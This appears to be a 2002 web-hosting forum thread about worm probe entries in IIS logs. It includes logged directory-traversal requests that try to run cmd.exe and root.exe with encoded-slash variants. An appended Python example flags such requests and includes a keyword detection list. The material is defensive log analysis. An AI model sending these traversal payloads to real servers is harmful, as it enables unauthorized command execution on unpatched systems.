#1
Anyone else seeing these entries in their logs? Why do people even bother to try this crap?
2002-09-19 14:20:30 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /scripts/root.exe /c+dir 404 3 4184 72 0 HTTP/1.0 - - -
2002-09-19 14:20:30 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /MSADC/root.exe /c+dir 404 3 4184 70 0 HTTP/1.0 - - -
2002-09-19 14:20:30 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /c/winnt/system32/cmd.exe /c+dir 404 3 4184 80 0 HTTP/1.0 - - -
2002-09-19 14:20:30 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /d/winnt/system32/cmd.exe /c+dir 404 3 4184 80 0 HTTP/1.0 - - -
2002-09-19 14:20:31 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 3 4184 96 0 HTTP/1.0 - - -
2002-09-19 14:20:31 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 3 4184 117 0 HTTP/1.0 - - -
2002-09-19 14:20:31 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 3 4184 117 0 HTTP/1.0 - - -
2002-09-19 14:20:31 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 404 3 4184 145 0 HTTP/1.0 - - -
2002-09-19 14:20:32 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 404 3 4184 97 0 HTTP/1.0 - - -
2002-09-19 14:20:32 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 3 4184 97 0 HTTP/1.0 - - -
2002-09-19 14:20:32 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /winnt/system32/cmd.exe /c+dir 404 3 4184 97 0 HTTP/1.0 - - -
2002-09-19 14:20:32 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /winnt/system32/cmd.exe /c+dir 404 3 4184 97 0 HTTP/1.0 - - -
2002-09-19 14:20:33 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 3 4184 98 0 HTTP/1.0 - - -
2002-09-19 14:20:33 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 3 4184 96 0 HTTP/1.0 - - -
2002-09-19 14:20:33 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 3 4184 100 16 HTTP/1.0 - - -
2002-09-19 14:20:33 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 3 4184 96 0 HTTP/1.0 - - -
#2
That happens ALL THE TIME when you have a Windows machine online. Nothing you can do except hope the servers are patched =)
#3
Yep
They are all patched, it's just Codered running around trying to get in to servers..
#4
Welcome to the wonderful world of hosting
Seriously, this is the signature of a Sir-Cam type worm virus. Probably from a computer that the owner doesn't even know is infected. For Unix-based hosting, you are usually safe against these attacks since the requests do not apply. It's common to see these in Unix logs as well. With Windows-based, if the IIS machine is current on any MS security updates, they are usually not a problem.
__________________
Bill === Linux... the better picker-upper
Last edited by BCS : 09-19-2002 at 02:58 PM.
#5
Yes, however, it sure does clog up the log files!
#6
xweb
We will be setting up a new firewall here soon so I may make a forum for this.. Where users could submit their logs and we could block the server doing it and send them an email. It would be a lot of work but may be able to work something out.
#7
Sounds like a good idea...
Not sure if you can, but ideally if you can filter keywords in the http get command, you could cut out most of these with a few choice words.. eg /winnt/ /cmd.exe etc... of course you would have to be VERY sure that no legitimate request would come through with those keywords in it!
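
Added example, not part of any post in this thread: one way to apply the keyword idea from post #7 to IIS logs like those in post #1, matching on the decoded path rather than on raw substrings so legitimate URLs are not flagged, and reporting any probe that did not return 404. The field order, function names and sample lines are assumptions constructed for illustration.

```python
from collections import defaultdict
from urllib.parse import unquote

# Field order assumed from the log lines in post #1 (no #Fields header is shown).
FIELDS = "date time c_ip user site host s_ip s_port method stem query status".split()
SHELLS = {"cmd.exe", "root.exe"}  # executables requested in those log lines

# Constructed sample lines in the same layout, using documentation IP ranges.
SAMPLE = [
    "2002-09-19 14:20:31 192.0.2.10 - W3SVC1 WEB1 198.51.100.5 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 3 4184 96 0 HTTP/1.0 - - -",
    "2002-09-19 14:20:33 192.0.2.10 - W3SVC1 WEB1 198.51.100.5 80 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200 0 512 98 0 HTTP/1.0 - - -",
    "2002-09-19 14:21:02 192.0.2.77 - W3SVC1 WEB1 198.51.100.5 80 GET /kb/cmd.exe-reference.html - 200 0 9120 88 0 HTTP/1.0 - - -",
]


def normalize(stem):
    """Percent-decode until stable (catches %255c), unify slashes, lowercase."""
    prev = None
    while prev != stem:
        prev, stem = stem, unquote(stem)
    return stem.replace("\\", "/").lower()


def is_probe(stem):
    # Flag a path whose last segment is a shell binary or that contains a '..'
    # segment; a substring match would also hit /kb/cmd.exe-reference.html.
    parts = [p for p in normalize(stem).split("/") if p]
    return bool(parts) and (parts[-1] in SHELLS or ".." in parts)


def summarize(lines):
    """Per client IP: number of probes, plus any probe that did not get a 404."""
    report = defaultdict(lambda: {"probes": 0, "not_404": []})
    for line in lines:
        if line.startswith("#") or not line.strip():
            continue  # skip W3C directive lines and blanks
        rec = dict(zip(FIELDS, line.split()))
        if len(rec) < len(FIELDS) or not is_probe(rec["stem"]):
            continue
        entry = report[rec["c_ip"]]
        entry["probes"] += 1
        if rec["status"] != "404":
            entry["not_404"].append((rec["time"], rec["stem"], rec["status"]))
    return dict(report)


if __name__ == "__main__":
    print(summarize(SAMPLE))
```

An empty `not_404` list for every source matches what the posters describe (patched servers answering 404); any entry in it is the request to look at first.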
#8
admin
That does sound like a good plan.